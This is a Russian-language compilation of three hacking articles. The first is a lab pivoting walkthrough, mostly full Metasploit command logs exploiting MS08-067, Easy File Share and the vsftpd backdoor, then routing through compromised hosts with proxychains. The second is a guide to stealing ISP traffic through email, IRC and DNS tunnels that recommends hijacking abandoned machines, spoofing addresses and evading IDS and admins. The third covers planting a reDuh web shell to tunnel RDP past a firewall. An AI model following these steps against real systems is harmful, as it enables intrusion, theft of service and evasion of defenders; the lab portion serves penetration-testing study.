Metasploit Framework имеет модуль для эксплуатации уязвимости exploit/windows/smb/ms08_067_netapi. Важно заметить, что мы используем пейлоад bind_tcp, т.к. у нас не определены маршруты в обе стороны и целевая система не сможет выполнить обратное подключение на машину атакующего, т.к. не имеет соответствующего маршрута. Таким образом, целевая машина будет просто ждать подключения на порт, который мы укажем в настройках пейлоада bind_tcp. Ниже на схеме указана последовательность шагов при использовании прямого и обратного подключений.

Выберем модуль для эксплуатации MS08-067, пейлоад bind_tcp и скомпрометируем вторую машину:

msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes The SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > set rhost 7.7.7.20 rhost => 7.7.7.20 msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 7.7.7.20 yes The target address RPORT 445 yes The SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LPORT 4444 yes The listen port RHOST 7.7.7.20 no The target address Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > run [*] Started bind handler [*] 7.7.7.20:445 - Automatically detecting the target... [*] 7.7.7.20:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown [*] 7.7.7.20:445 - We could not detect the language pack, defaulting to English [*] 7.7.7.20:445 - Selected Target: Windows 2003 SP2 English (NX) [*] 7.7.7.20:445 - Attempting to trigger the vulnerability... [*] Sending stage (957999 bytes) to 7.7.7.20 [*] Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 -> 7.7.7.20:4444) meterpreter >

Уязвимость Easy File Share BoF

Также можно воспользоваться другой найденной уязвимостью в приложении Easy File Share. Компрометация машины может быть произведена следующим образом:msf > use exploit/windows/http/easyfilesharing_seh msf exploit(easyfilesharing_seh) > show options Module options (exploit/windows/http/easyfilesharing_seh): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 80 yes The target port Exploit target: Id Name -- ---- 0 Easy File Sharing 7.2 HTTP msf exploit(easyfilesharing_seh) > set rhost 7.7.7.20 rhost => 7.7.7.20 msf exploit(easyfilesharing_seh) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf exploit(easyfilesharing_seh) > run [*] Started bind handler [*] 7.7.7.20:80 - 7.7.7.20:80 - Sending exploit... [+] 7.7.7.20:80 - Exploit Sent [*] Sending stage (957999 bytes) to 7.7.7.20 [*] Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 -> 7.7.7.20:4444) at 2016-12-26 14:21:11 +0300 meterpreter > ipconfig Interface 1 ============ Name : MS TCP Loopback interface Hardware MAC : 00:00:00:00:00:00 MTU : 1520 IPv4 Address : 127.0.0.1 Interface 65539 ============ Name : Intel(R) PRO/1000 MT Desktop Adapter Hardware MAC : 08:00:27:29:cd:cb MTU : 1500 IPv4 Address : 8.8.8.3 IPv4 Netmask : 255.255.255.0 Interface 65540 ============ Name : Intel(R) PRO/1000 MT Desktop Adapter #2 Hardware MAC : 08:00:27:e3:47:43 MTU : 1500 IPv4 Address : 7.7.7.20 IPv4 Netmask : 255.255.255.0 meterpreter > Ниже схематично представлена атака:

Так как мы получили доступ на машину 7.7.7.20, мы можем продолжить сбор информации. Как оказалось, машина JC так же имеет два сетевых интерфейса. Это означает, что мы нашли вторую сеть, к которой не имеем прямого доступа (8.8.8.0/24).

meterpreter > ipconfig Interface 1 ============ Name : MS TCP Loopback interface Hardware MAC : 00:00:00:00:00:00 MTU : 1520 IPv4 Address : 127.0.0.1 Interface 65539 ============ Name : Intel(R) PRO/1000 MT Desktop Adapter Hardware MAC : 08:00:27:29:cd:cb MTU : 1500 IPv4 Address : 8.8.8.3 IPv4 Netmask : 255.255.255.0 Interface 65540 ============ Name : Intel(R) PRO/1000 MT Desktop Adapter #2 Hardware MAC : 08:00:27:e3:47:43 MTU : 1500 IPv4 Address : 7.7.7.20 IPv4 Netmask : 255.255.255.0 Продолжим собирать информацию о найденной подсети при помощи arp-сканнера. meterpreter > run post/windows/gather/arp_scanner RHOSTS=8.8.8.0/24 [*] Running module against SRV03 [*] ARP Scanning 8.8.8.0/24 [*] IP: 8.8.8.3 MAC 08:00:27:29:cd:cb (CADMUS COMPUTER SYSTEMS) [*] IP: 8.8.8.1 MAC 0a:00:27:00:00:03 (UNKNOWN) [*] IP: 8.8.8.9 MAC 08:00:27:56:f1:7c (CADMUS COMPUTER SYSTEMS) [*] IP: 8.8.8.13 MAC 08:00:27:13:a3:b1 (CADMUS COMPUTER SYSTEMS) Сканирование показало, что в сети присутствует 4 машины. Продолжим прокладывать наш туннель. meterpreter > run autoroute -s 8.8.8.0/24 [*] Adding a route to 8.8.8.0/255.255.255.0... [+] Added route to 8.8.8.0/255.255.255.0 via 7.7.7.20 [*] Use the -p option to list all active routes msf > route print Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 7.7.7.0 255.255.255.0 Session 1 8.8.8.0 255.255.255.0 Session 3

Двойной удар pivoting

Мы обнаружили сеть 8.8.8.0/24. У нас уже есть маршрут между 172.16.0.0/24 и 7.7.7.0/24 через скомпрометированную машину RD. В текущей конфигурации пакеты, приходящие из сети 172.16.0.20 на хост JC (вторая скомпрометированная машина) сперва идут на хост RD (первая скомпрометированная машина) и RD уже транслирует их на машину JC. Если атакующий (172.16.0.20) теперь хочет получить доступ к новой сети 8.8.8.0/24, должно быть определено новое правило маршрутизации. Чтобы использовать инструменты за пределами Metasploit Framework мы должны запустить новый socks4 прокси-сервер, чтобы соединить два pivot-узла, после чего задать новый прокси сервер в настройках proxychains.

Сетевые пакеты с адресом назначения 8.8.8.9, отправленные с машины атакующего (172.16.0.20) должны пройти через две скомпрометированные машины:

  • RD: Я не знаю как получить доступ к IP 8.8.8.9. Но я знаю роутер, который сможет получить доступ к этому IP. Я могу перенаправить пакет ему.
  • JC: Я знаю как перенаправить пакеты из сети 7.7.7.0/24 в сеть 8.8.8.0/24.
В результате мы получаем такую схему:

Всемогущий ProxyChains

Инструмент ProxyChains создает туннель через цепочку прокси-серверов и передает по нему пакет до адреса назначения. Последним шагом будет создание socks4 прокси-сервера, слушающего порт 1081 для сети 8.8.8.0/24.msf exploit(ms08_067_netapi) > use auxiliary/server/socks4a msf auxiliary(socks4a) > show options Module options (auxiliary/server/socks4a): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 172.16.0.20 yes The address to listen on SRVPORT 1080 yes The port to listen on. Auxiliary action: Name Description ---- ----------- Proxy msf auxiliary(socks4a) > set SRVPORT 1081 SRVPORT => 1081 msf auxiliary(socks4a) > run [*] Auxiliary module execution completed [*] Starting the socks4a proxy server msf auxiliary(socks4a) > The information of the new proxy server will define in the /etc/proxychains.conf configuration file. By activating the Dynamic Chain setting, sequential switching between the defined proxy servers is ensured. Остается адаптировать настройки proxychains в файле /etc/proxychains.conf. Опция Dynamic Chain используется, чтобы пакеты шли строго по цепочке прокси-серверов, указанному в файле конфигурации proxychains, в порядке сверху вниз[email protected]:~# cat /etc/proxychains.conf | grep -v "#" dynamic_chain proxy_dns tcp_read_time_out 15000 tcp_connect_time_out 8000 socks4 172.16.0.20 1080 # First Pivot socks4 172.16.0.20 1081 # Second Pivot Теперь при помощи proxychains мы можем просканировать хост 8.8.8.9 через наш туннель:[email protected]:~# proxychains nmap -sT -sV -p21,22,23,80 8.8.8.9 -n -Pn -vv ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 7.25BETA1 ( https://nmap.org ) Nmap wishes you a merry Christmas! Specify -sX for Xmas Scan (https://nmap.org/book/man-port-scanning-techniques.html). NSE: Loaded 36 scripts for scanning. Initiating Connect Scan Scanning 8.8.8.9 [4 ports] |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:21-<><>-OK Discovered open port 21/tcp on 8.8.8.9 |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:23-<><>-OK Discovered open port 23/tcp on 8.8.8.9 |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:22-<><>-OK Discovered open port 22/tcp on 8.8.8.9 |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK Discovered open port 80/tcp on 8.8.8.9 Completed Connect Scan at 05:54, 1.37s elapsed (4 total ports) Initiating Service scan at 05:54 Scanning 4 services on 8.8.8.9 |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:21-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:22-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:23-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK Completed Service scan at 05:54, 11.09s elapsed (4 services on 1 host) NSE: Script scanning 8.8.8.9. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 05:54 |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK Completed NSE at 05:54, 1.71s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 05:54 Completed NSE at 05:54, 0.00s elapsed Nmap scan report for 8.8.8.9 Host is up, received user-set (0.41s latency). Scanned PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack vsftpd 2.3.4 22/tcp open ssh syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet syn-ack Linux telnetd 80/tcp open http syn-ack Apache httpd 2.2.8 ((Ubuntu) DAV/2) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.59 seconds [email protected]:~# Как видите, пакеты проходят через два прокси-сервера и, в конечном счете, достигают цели. В результате сканирования можно обнаружить уязвимую версию vsftpd на хосте 8.8.8.9. Выполним следующие шаги, чтобы скомпрометировать цель:msf > msf > use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 21 yes The target port Exploit target: Id Name -- ---- 0 Automatic msf exploit(vsftpd_234_backdoor) > set rhost 8.8.8.9 rhost => 8.8.8.9 msf exploit(vsftpd_234_backdoor) > run [*] 8.8.8.9:21 - Banner: 220 (vsFTPd 2.3.4) [*] 8.8.8.9:21 - USER: 331 Please specify the password. [+] 8.8.8.9:21 - Backdoor service has been spawned, handling... [+] 8.8.8.9:21 - UID: uid=0(root) gid=0(root) [*] Found shell. [*] Command shell session 4 opened (Local Pipe -> Remote Pipe) pwd / id uid=0(root) gid=0(root) ifconfig eth0 Link encap:Ethernet HWaddr 08:00:27:56:f1:7c inet addr:8.8.8.9 Bcast:8.8.8.255 Mask:255.255.255.0 inet6 addr: fe80::a00:27ff:fe56:f17c/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:10843 errors:0 dropped:0 overruns:0 frame:0 TX packets:2779 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1081842 (1.0 MB) TX bytes:661455 (645.9 KB) Base address:0xd010 Memory:f0000000-f0020000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:18161 errors:0 dropped:0 overruns:0 frame:0 TX packets:18161 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:5307479 (5.0 MB) TX bytes:5307479 (5.0 MB)

Меры противодействия

Незащищенные хосты, имеющие два сетевых интерфейса, среди которых один доступен из DMZ, должны быть удалены из сетевой инфраструктуры. Хосты, находящиеся в DMZ должны быть доступны только из DMZ.

Заключение

Атакующий обнаружил две скрытые сети в результате следующих шагов:
  1. Атакующий получил доступ к машине RD, которая находилась в той же сети, что и атакующий.
  2. Было обнаружено, что хост RD имеет два сетевых интерфейса и имеет доступ в скрытую сеть.
  3. Атакующий определил правило маршрутизации при помощи post-модуля Metasploit autoroute.
  4. Проведено ARP и NMAP сканирование сет 7.7.7.0/24 и была обнаружена машина JC.
  5. JC имела две публичные уязвимости: Easy File Share и MS08-067.
  6. Успешная эксплуатация MS08-067 позволила атакующему получить доступ к машине 7.7.7.20
  7. В результате сбора информации, оказалось, что машина JC также имеет два сетевых интерфейса и имеет доступ во вторую скрытую сеть.
  8. Второй правило маршрутизации было определено через сессию метерпретера на хосте JC  (7.7.7.20).
  9. Было проведено ARP и NMAP сканирование в отношении сети 8.8.8.0/24.
  10. В результате сканирования был обнаружен уязвимый сервис vsftp на машине 8.8.8.9 (имя хоста SK).
  11. Машина SK была скомпрометирована.

Таким образом, атакующий, имея доступ лишь к одной сети, через серию атак, сумел скомпрометировать хост, находящийся далеко в глубине корпоративной сети за защищенным сетевым периметром.

В качестве тренировочной площадки рекомендуем использовать лаборатории тестирования на проникновение.

habrahabr.ru

Воровство траффика: туннелинг - «Хакер»

Здравствуй, мой маленький любитель халявы!Сегодня мы поговорим с тобой о воровстветраффика. Мы обсудим один из наиболееинтересных (и, вместе с тем, муторных)способов относительно честного отъематраффика у провайдера, о туннелированиичерез бесплатно доступные сервисы. Этастатья будет особенно интереснапользователям подключенным к Интернетудомовыми и корпоративными сетями, хотя,возможо, диалап-пользователи тоже смогутпочерпнуть в ней что-то для себянебесполезное.

Под термином "туннелирование" в данномконтексте я имею ввиду пакетнуюинкапсуляцию IPv4-траффика внутрь протоколовбесплатно доступных пользователю сервисов.Иными словами, "упаковку" нелегальногоIPv4-траффика на клиентской стороне, внутрипровайдерской инфраструктуры и "распаковку"этого траффика обратно, на сервернойстороне, вне пределов провайдерской сети.

Приведенная принципиальнаясхема наглядно иллюстрирует этот подход.

Технология весьма проста и очевидна:

1) Клиентская прокси-программа налокалхосте злобного хакера выполняетфункции сетевого стека дляпользовательских программ. Она "схватывает"и проксюет IPv4-траффик нужных программ, "запаковывая"исходящий траффик и "распаковывая"входящий (мы использовали совокупностьпрограмм SocksCap и специально написанного дляэтих целей socks-сервера).

2) Серверная прокси-программа на стороне-приёмникевыполняет обратные описанным в [1] функции.

3) Траффик между [1] и [2] идёт по дозволенному,вполне легальному с точки зрения политикипровайдера, туннелю. При необходимости,связь между [1] и [2] можно прикрывать SOCKS- и HTTP-проксями,чтобы админы насилуемого провайдера (вслучае обнаружения воровства траффика) несмогли отыскать местонахождение сервернойпрокси-программы.

По большому счёту, в этом подходе нет ничегонового и оригинального. Туннелирование иинкапсуляция используются весьма активно иповсеместно: порой, это единственный способобойти естественные и объективныетопологические ограничения. Но, тем неменее, я ни разу ещё не встречал людей,использующих туннелирование с цельюворовства траффика (хотя я неоднократнослышал об успехах таких деятелей =))

ЧЕМ?

Что касается технических вопросовреализации туннелинга, то инкапсулироватьможно практически что угодно и практическикуда угодно =)) Что-то туннелировать проще,что-то — сложнее. Например, mirc-туннелинг мнеудался куда проще, чем DNS-туннелинг,несмотря на то, что у меня была программа LOKIиз журнала phrack (issue 51, volume 7), котораявыполняет схожие функции. И я уверен, чтотехнические трудности реализации неотпугнут тебя, друг мой, а, наоборот,заинтересуют!

И КУДА?

Есть ещё одна объективная трудность,которая отпугнёт многих дельфистов:необходимость иметь некий внешний ресурс,который можно было бы нагрузить сервернойчастью… Я вижу лишь два варианта: 1) взлом изахват каких-нибудь бесхозных удалённыхмашин (число коих — легион =))) или 2)приобретение в Буржандии легальногохостинга, цена которого вряд ли где-нибудьпревышает полутора-двух баксов за гигабайт.

БЕСПЛАТНЫЕ СЕРВИСЫ

Многие (если не все) домовые сети, о которых,в основном, идёт речь, обладают некоторымчислом бесплатно доступных сервисов. Под"бесплатно доступными сервисами"можно понимать те сервисы, оплата заиспользование которых либо не взимаетсявовсе, либо она уже включена в оплату запользование локальной сетью. Это может бытьчто угодно: игровые сервисы с выходом в мир,ICMP-траффик (пинги), DNS-траффик, irc-сервер…

В сети, где проводили испытания мы, к этимсервисам относятся email, DNS-резолвингпроизвольных имён и mirc-сервер с выходом вмир. Именно про грамотное использованиеэтих сервисов я и расскажу сегодня. Я дамтебе необходимое количество практическихсоветов по максимально эффективному обходуподводных камней в этой области хакерской (хотя,скорее хэкерской) деятельности =)))

ЭЛЕКТРОННАЯ ПОЧТА

Использование email’а для туннелированиятраффика в реальном времени (например, длясёрфинга по сайтам) — идейка весьма-такипремерзкая. Можешь представить себе,сколько времени займет даже самаямаленькая транзакция по email’у туда-обратно,особенно если для получения писем по POPнеобходима SMTP-авторизация. Поэтому,единственный, на мой взгляд, адекватныйспособ применения email-туннелинга — этоотложенный заказ файлов по ftp и http.

Насколько я знаю, ещё несколько лет назадтакие бесплатные и публичные сервисысуществовали и были повсеместнораспространены: нужно было лишь отправитьна некий email список нужных URL’ов и ждать, покаэти файлы не придут на твой адрес. Внекоторых случаях (когда локальная сетьимела лишь email-доступ в Интернет), это былаединственная возможность получать файлы =)))Теперь таких сервисов уже не осталось. Сталбыть, нужно организовывать собственный.Итак, серверная часть должна уметь:

1) скачивать файлы и фрагменты файлов по http иftp;2) делить большие файлы на куски, желаемыеюзером;3) упаковывать файлы в ту кодировку, которую"скушает" насилуемый mail-сервак.

Если не заниматься хэкерством, т.е. если неписать весь сервер с нуля на бейсике или наассемблере, то реализовать такую программуможно связкой bash+sendmail+netcat+wget+whatever+you+want. Какты видишь, это — самый простой в реализации ииспользовании способ скачивания файловнахаляву. Но, вместе с тем, самый легкообнаруживаемый.

Кроме того, с этим методом весьма простобороться. Админу достаточно лишь ввестиквоту на количество мегабайт почты в суткидля каждого рядового пользователя.

IRC-ТУННЕЛИНГ

Этот способ намного изящнее и гибчепредыдущего: здесь уже вполне реальнотуннелирование траффика в реальном времени.Даже при связи серверного баунсера с irc-сервакомчерез один SOCKS-прокси, мы имели средний "пинг"около 400 миллисекунд. Этот способ (особеннопри довольно крепкой загрузке irc-сервака)труднее обнаружить. Кроме того, стандартныйадмин вряд ли сможет с пол-пинка придуматьадекватную защиту от irс-туннелинга, развечто беспощадно учинив своему irc-сервакужестокий шейпинг и квотирование (вызвав,тем самым, волны недовольства среди честныхи мирных пользователей =))).

Итак, хакерский клиентский компонент, вданном случае, оснащён irc-клиентом, асерверная часть обладает irc-bouncer’ом с однимили несколькими аккаунтами к насилуемомуirc-серваку. Баунсер может выходить на связьс irc-сервером через один или несколькопроксей.

Плюсы этого способа очевидны, и еслисерверные nick’и не выводить в какие-либо irc-каналы,можно оставаться незамеченным сколь угоднодолго. А вот минусы этого способа следуетобсудить отдельно:

1) На том серваке, где проводилитестирования мы, при превышении скорости в 2kb/sec, мы стабильно получали Excess Flood напринимающей стороне. Стало быть, нужно либопридерживаться этого ограничения, либовводить несколько "ников"-принимателейи работать с ними параллельно.

2) Следует избегать устойчивых сигнатурпротокола инкапсуляции воровскоготраффика. Это относится к любому извозможных вариантов пакетноготуннелирования: любая IDS-система (дажедоморощенная вроде snort-based) может бытьнастроена отлавливать либо устойчивыепоследовательности байт, либо устойчивыеразмеры дейтаграмм, либо и то, и другоеодновременно.

Вообще говоря, протокол инкапсуляцииследует проектировать с особойтщательностью, не перегружая егоизбыточной информацией, необходимость вкоторой сомнительна. Иными словами, тебе неследует переписывать TCPv4 под собственныенужды. Достаточно лишь реализоватьнекоторые его основные функции:

1) Если речь идёт о irc-туннелинге (либо отуннелировании через любой другой tcp-based-сервис),то достаточно обойтись лишь нумерациейочередной пачки данных.

2) Если ты занимаешься протоколом пакетнойинкапсуляции (поверх, например, udp или icmp),тебе необходимо добавить обеспечениецелостности потоков передаваемых данныхдополнительной контрольной суммой.Протокол неплохо бы оснастить возможностьюдоговора между клиентом и сервером ожелаемой скорости и насыщенности траффикадруг между другом.

3) Динамическое сжатие и шифрование данныхвполне могут иметь своё законное место впротоколе инкапсуляции. Ты можешьиспользовать открытые и весьма удобныебиблиотеки libbzip2 и rsaeuro, для сжатия ишифрования потоков данных, соответственно.Кстати, я вскоре опубликую на этом сайтенебольшие хавту по программированию сиспользованием этих библиотек.

Итак, mirc-туннелинг — штука интересная иромантичная. 

DNS-ТУННЕЛИНГ

Это — самый сложный и грубый из освоенныхнами способов =)) Итак, если ты имеешьвозможность контролировать какой-нибудь nameserver в Большом Интернете (в идеале — dns-сервер,стоящий непосредственно выше dns-серверовнасилуемого тобой провайдера), то этотспособ — для тебя.

Смысл его состоит в том, что хакерскийклиентский компонент "упаковывает"воровской IPv4-траффик в dns-запросы наразрешение адреса по имени (или в какие-либодругие запросы) и отправляет их dns-серверупровайдера. Провайдерский сервак, не найдяответы на эти вопросы, форвардит их дальше,вышестоящему dns-серверу. Таким образом, этизапросы достигают серверного компонента (владельцазапрашиваемого домена). Серверная частьотправляет осмысленные ответы (смыслкоторых понятен лишь злобному хакеру =)),которые, в конечном счёте, достигаютклиентского компонента.

Плюсы этого метода очевидны: приоритет у dns-запросовнастолько высок, что ты сможешь загрузитьвесь канал провайдера по максимуму. Крометого, спуфинг UDP-траффика — дело крайнепростое и необременительное, и ты сможешьлегко и не напрягаясь подставлять любуюпару MAC/IP из твоего сегмента, отправляя с нихзапросы и случая приходящие к ним ответысниффером.

К минусам можно, безусловно, отнеститрудности реализации этого метода, а такжевесьма неприятные ограничения, связанные спротоколом DNS/UDP: я не рекомендовал бы тебеформировать запросы более чем из 8 словразмером более чем по 25 символов каждый.Необходимо соблюдать уникальность каждогоследующего запроса, так как великавероятность того, что dns-сервера будутдовольно-таки многомегабайтно кэшироватьтвои запросы. Кроме того, есть вероятностьтого, что один из насилуемых dns-серверов (провайдерскийили любой передающий) могут банально упасть,если его кэш-база не сквотирована нафиксированный размер.

Среди способов возможной борьбы с dns-туннелингомможно выделить подушное квотирование dns-траффика.Админ того провайдера, где мы проводилииспытания, просто обрубал dns-траффик на нашсегмент и банил на роутерах те MAC/IP-адреса,которые мы спуфили.

Как ты видишь, DNS-туннелинг — способ грубый,трудноконтролируемый, и при слишкомактивном использовании он может привести кнепредсказуемым последствиям. В локальныхсетях лучше использовать более щадящие инежные способы воровства траффика, а вотдля диалапщиков которые хотят абузитьгостевые телефонные входы это, пожалуй,единственный вариант… Если ты, всё же,решился изучить и реализовать этот способ,обратись к помощи библиотеки libbind. Прочтитакже седьмую статью 51-го phrack’а.

ПИНГИ

ICMP-туннелинг и разговоры о нём стары какИнтернет =) Я счёл нужным про него не забыть,но рассказывать нём я не стану.

О РЕАЛИЗАЦИИ

Я, наверное, просто не умею пользоватьсяпоисковиками… Но мне так и не удалось найтини одной публичной реализации тех видовтуннелинга траффика реального времени, окоторых я рассказывал. И это даёт мнеоснования полагать, что таких реализацийпросто нет. Поэтому, многое тебе придётсяделать самому. Бери libbind, libbzip2, rsaeuro, rfc 791, 792,793, 768, 1122, 1034, 1035, а также те, которыерегламентируют протоколы доступных тебебесплатных сервисов и… желаю удачи! =)))

С уважением, [Privacy]

xakep.ru

Про HTTP-туннелирование - «Хакер»

Понадобилось мне тут на днях воспользоваться достаточно известным приемом, а именно — HTTP-туннелингом. О существовании решений, позволяющих создать TCP-соединение поверх HTTP-запросов, я знал давно, но на практике никогда не использовал. Как оказалось, это действительно неплохо работающий способ обойти файрвол и достучаться до внутренних хостов локальной сети через веб-сервер, который открыт «наружу».

Если ты сможешь залить на этот сервер специальный веб-сценарий, то с большой вероятностью получишь возможность обращаться к узлам из локальной сети этого сервера, которые при этом в инете не открыты! Любое подобное решение состоит из двух частей — клиента и сервера, которые инкапсулируют трафик в обычные HTTP GET- и POST-запросы и передают в таком виде данные между собой.

Данные при этом сжимаются, криптуются и кодируются в base64. Существует много реализаций подобного подхода, в том числе немало коммерческих. Опытные товарищи посоветовали две бесплатные разработки: reDuh (sensepost.com/labs/tools/pentest/reduh) и HTTPTunnel (httptunnel.sourceforge.net). Мне приглянулась первая, так как ее серверная часть (та, которая заливается на веб-сервер) доступна в трех вариациях: на JSP, PHP и ASPX. В зависимости от того, какие технологии используются на веб-сервере, можно выбрать подходящий вариант.

Клиентская часть при этом написана на Java и, соответственно, может быть запущена под любой ОС. Итак, как это работает? Рассмотрим конкретный пример.

Допустим, пентестер Иван, проводя исследование, нашел в некотором вебсценарии уязвимость и может загрузить на сервер скрипт для HTTP-туннелинга.При этом ему стало известно, что где-то внутри локалки находится RPD-сервер с названием хоста term-serv.victim.com, к которому нет доступа «снаружи» из-за файрвола. Брандмауэр пропускает к вебсерверу только HTTP-трафик и больше ничего. Подключиться к этому серверу и другим хостам из внутренней локальной сети Иван может с помощью HTTPтуннелинга. Это выглядит так:

1.Иван заливает на сервер скрипт reDuh.jsp, который становится доступным по некоторому адресу (пусть это будет ubunt00.victim.com/uploads/reDuh.jsp). Это серверная часть, и она не нуждается в настройке.

2. На локальной машине запускается клиентская часть reDuh — reDuhClient. Это консольное приложение, которому в качестве параметра для запуска передается адрес только что загруженного скрипта:

$ java reDuhClient ubunt00.victim.com 80 /uploads/reDuh.jsp

3.Указать адрес серверной части мало — необходимо еще отконфигурировать туннели с помощью админки, которая по умолчанию запускается на 1010 порту.Ивану требуется пробросить локальный порт 1234 на порт 3389 (RPD) хоста termserv.victim.com, поэтому правило будет следующим:

[createTunnel]1234:term-serv.victim.com:3389

4.Все, теперь если Иван подключится с помощью любого RDP-клиента к localhost:1234, то весь его TCP-трафик будет инкапсулироваться в HTTP-запросы, которые передаются на ubunt00.victim.com/uploads/reDuh.jsp, а оттуда уже переадресуются на целевой сервер. Таким образом, он получит желанный доступ к удаленному рабочему столу.

Тут надо сказать, что reDuh не ограничивает количество соединений, поэтому ты можешь создать несколько туннелей для разных хостов и разных сервисов (например, SSH) и использовать их одновременно! Ради интереса я попробовал еще и HTTPTunnel, которая оказалась не менее замечательной разработкой.Ее большой плюс заключается в наличии специальной клиентской версии с удобным GUI-интерфейсом (только для Windows).

Серверная часть есть в двух вариантах: на PHP и Perl’е. При этом HTTPTunnel может работать в качестве SOCKS-сервера.

Соответственно, подключаясь к внутренним хостам (например, в том же самом RDP-клиенте), ты можешь сразу указывать внутренний адрес хостов для подключения (если возвращаться к нашему примеру, то это term-serv.victim.com).

Но при этом надо предварительно позаботиться о том, чтобы в настройках программы был прописан локальный SOCKS, созданный HTTPTunnel. На случай, если какое-то приложение не поддерживает работу через прокси, его трафик можно принудительно соксофицировать с помощью FreeCap (freecap.ru), tsocks (tsocks.sourceforge.net) или любых других аналогичных приложений.

xakep.ru


Смотрите также